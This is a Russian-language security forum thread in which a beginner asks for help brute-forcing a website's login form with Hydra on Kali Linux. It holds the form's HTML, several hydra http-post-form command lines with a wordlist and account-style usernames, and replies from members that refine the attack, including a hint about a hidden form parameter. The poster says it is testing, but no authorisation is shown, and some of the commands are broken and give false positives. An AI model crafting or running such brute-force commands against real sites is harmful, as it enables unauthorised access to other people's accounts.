• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

walkwalkwalk

Member
29.07.2020
8
0
BIT
0
Здравствуйте. Очень надо тестировать сайт на брутфорс. Я пытаюсь брутфорсить сайт на Hydra в системе Kali Linux но не получается написать команду.
Вот форма входа на сайт:
Код:
<div class="loginpanel">

        <h2>Вход</h2>

        <div class="subcontent loginsub">
                <div class="loginerrors" role="alert">
                    <a href="#" id="loginerrormessage" class="accesshide">Неверный логин или пароль, попробуйте заново.</a>
                    <span class="error"><i class="icon fa fa-exclamation text-warning fa-fw icon icon-pre" aria-hidden="true" title="Ошибка" aria-label="Ошибка"></i>Неверный логин или пароль, попробуйте заново.</span>
                </div>
            <form action="http://aaaaaa.aa/login/index.php" method="post" id="login">
                <div class="loginform">
                    <div class="form-label">
                        <label for="username">
                                Логин
                        </label>
                    </div>
                    <div class="form-input">
                        <input type="text" name="username" id="username" size="15" value="">
                    </div>
                    <div class="clearer"><!-- --></div>
                    <div class="form-label">
                        <label for="password">Пароль</label>
                    </div>
                    <div class="form-input">
                        <input type="password" name="password" id="password" size="15" value="">
                    </div>
                </div>

Как я понял страница использует метод POST. Вот пример страницы:
 

walkwalkwalk

Member
29.07.2020
8
0
BIT
0
Есть тема на форуме,там отлично все расписано

Спасибо за статью. Сложно. Конечно есть и примеры но похожие с моим сайтом нет. Поможете создать команду ?
 

BearSec

Platinum
20.04.2020
210
290
BIT
28
Без самого сайта тяжело отладить работу, но команда выглядит примерно вот так
hydra -l 111111 -p 222222 http-post-form://aaaaaa.aa -m "/index.php:username=^USER^&password=^PASS^:Неверный логин или пароль"
 

Shadow User

Green Team
10.07.2017
138
29
BIT
0
Основные элементы: form и input. В статье написано!
<form action=" " method="post" id="login">
<input type="text" name="username" id="username" size="15" value="">
<input type="password" name="password" id="password" size="15" value="">
А где submit?
 

walkwalkwalk

Member
29.07.2020
8
0
BIT
0
Основные элементы: form и input. В статье написано!
<form action=" " method="post" id="login">
<input type="text" name="username" id="username" size="15" value="">
<input type="password" name="password" id="password" size="15" value="">
А где submit?
Вся форма входа на верху в коде.
 

walkwalkwalk

Member
29.07.2020
8
0
BIT
0
Ну форма явно не вся. Кнопки на отправку нет. Закрывающего тега </form> нет.
Но в статье выше всё описано и все данные из формы у тебя есть, чтобы запустить брут
Значит выполнил всё как надо, но все пароли на списке выдаёт как правильный. В чём проблема? Вот моя команда hydra 111.111.11.11 -V -l 28459456783 -P /home/kali/slovar.txt http-post-form "/login/index.php:username=^USER^&password=^PASS^&anchor=:F=Неверный логин или пароль"
Да кстати форма входа была не полной. Вот полный код:
PHP:
    <div class="loginpanel">

        <h2>Вход</h2>

        <div class="subcontent loginsub">
                <div class="loginerrors" role="alert">
                    <a href="#" id="loginerrormessage" class="accesshide">Неверный логин или пароль, попробуйте заново.</a>
                    <span class="error"><i class="icon fa fa-exclamation text-warning fa-fw icon icon-pre" aria-hidden="true" title="Ошибка" aria-label="Ошибка"></i>Неверный логин или пароль, попробуйте заново.</span>
                </div>
            <form action="http://aaaaaa.aa/login/index.php" method="post" id="login">
                <div class="loginform">
                    <div class="form-label">
                        <label for="username">
                                Логин
                        </label>
                    </div>
                    <div class="form-input">
                        <input type="text" name="username" id="username" size="15" value="">
                    </div>
                    <div class="clearer"><!-- --></div>
                    <div class="form-label">
                        <label for="password">Пароль</label>
                    </div>
                    <div class="form-input">
                        <input type="password" name="password" id="password" size="15" value="">
                    </div>
                </div>

                <div class="clearer"><!-- --></div>
                    <div class="rememberpass">
                        <input type="checkbox" name="rememberusername" id="rememberusername" value="1"  />
                        <label for="rememberusername">Запомнить логин</label>
                    </div>
                <div class="clearer"><!-- --></div>
                <input id="anchor" type="hidden" name="anchor" value="" />
                <script>document.getElementById('anchor').value = location.hash;</script>
                <input type="submit" id="loginbtn" value="Вход" />
                <div class="forgetpass">
                    <a href="http://aaaaaa.aa/login/forgot_password.php">Забыли логин или пароль?</a>
                </div>
            </form>

Основные элементы: form и input. В статье написано!
<form action=" " method="post" id="login">
<input type="text" name="username" id="username" size="15" value="">
<input type="password" name="password" id="password" size="15" value="">
А где submit?
Код полностью добавил выше, посмотрите.
Протестил вот эти команды, во всех случаях очень много верных:
1) hydra -V -l 28001114549 -P /home/kali/slovar.txt http-post-form://aaaaaa.aa -m "/index.php:username=^USER^&password=^PASS^&anchor=:F=Неверный логин или пароль"

2) hydra 111.111.11.11 -V -l 28459456783 -P /home/kali/slovar.txt http-post-form "/login/index.php:username=^USER^&password=^PASS^&anchor=:F=Неверный логин или пароль"

3) hydra -V -l 28001114549 -p 785789879 http-post-form://aaaaaa.aa -m "/login/index.php:username=^USER^&password=^PASS^&cookieuser=1:F=Неверный логин или пароль"
 
Последнее редактирование:

Shadow User

Green Team
10.07.2017
138
29
BIT
0
Как и думал, скрытый параметр: anchor
rememberusername ставим в 0, а submit=Вход
Эго можна узнать так: console.log(document.getElementById('anchor').value)
 

walkwalkwalk

Member
29.07.2020
8
0
BIT
0
Подумать не пробовал?
Попробовал добавить недостающие строки после знака амперсанта (&). Всё также. Подбор ходит до половины, а остальные выдаёт как верными, но верный всего один.
Пример:
hydra -V -l 281446459764 -P /home/kali/slovar.txt http-post-form://aaaaaa.aa -m "/login/index.php:username=^USER^&password=^PASS^&rememberusername=0&submit="Вход"&console.log(document.getElementById('anchor').value):F=Неверный логин или пароль"
Я новичок в этой сфере (ИБ). Может надо изменить параметры в BurpSuite, перед отправкой запроса ? Честно говоря последнюю строку не понял console.log(document.getElementById('anchor').value)
Подскажите что-нибудь ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!